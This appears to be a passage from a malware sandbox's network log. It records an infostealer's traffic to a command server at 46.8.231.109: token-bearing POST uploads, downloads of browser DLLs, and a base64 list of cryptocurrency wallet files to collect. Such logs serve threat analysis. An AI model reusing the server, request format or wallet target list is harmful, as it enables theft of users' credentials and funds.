                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: ------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file"------DBGHDGHCGHCAAKFIIECF--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.491866112 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:08 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.951056957 CEST562OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFC
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 363
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: ------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="file"------IIEBAFCBKFIDGCAKKKFC--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:09.154352903 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:09 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.330142975 CEST91OUTGET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505001068 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:10 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "a7550-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 685392
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.203397036 CEST91OUTGET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.376545906 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:11 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "94750-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 608080
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.850043058 CEST92OUTGET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.023684978 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:11 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "6dde8-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 450024
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.649805069 CEST88OUTGET /1309cdeb8f4c8736/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:12.823347092 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:12 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "1f3950-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 2046288
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.369039059 CEST92OUTGET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:14.542373896 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:14 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "3ef50-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 257872
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:15.278080940 CEST96OUTGET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:15.452027082 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:15 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "13bf0-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 80880
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:16.116692066 CEST199OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 947
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:16.318063021 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:16 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=84
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:16.345400095 CEST466OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJ
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 267
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------HIJJDGDHDGDAKFIECFIJContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------HIJJDGDHDGDAKFIECFIJContent-Disposition: form-data; name="message"wallets------HIJJDGDHDGDAKFIECFIJ--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:16.524463892 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:16 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 2408
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=83
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:16.527192116 CEST464OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BGIJEGCGDGHDHIDHDGCB
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 265
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
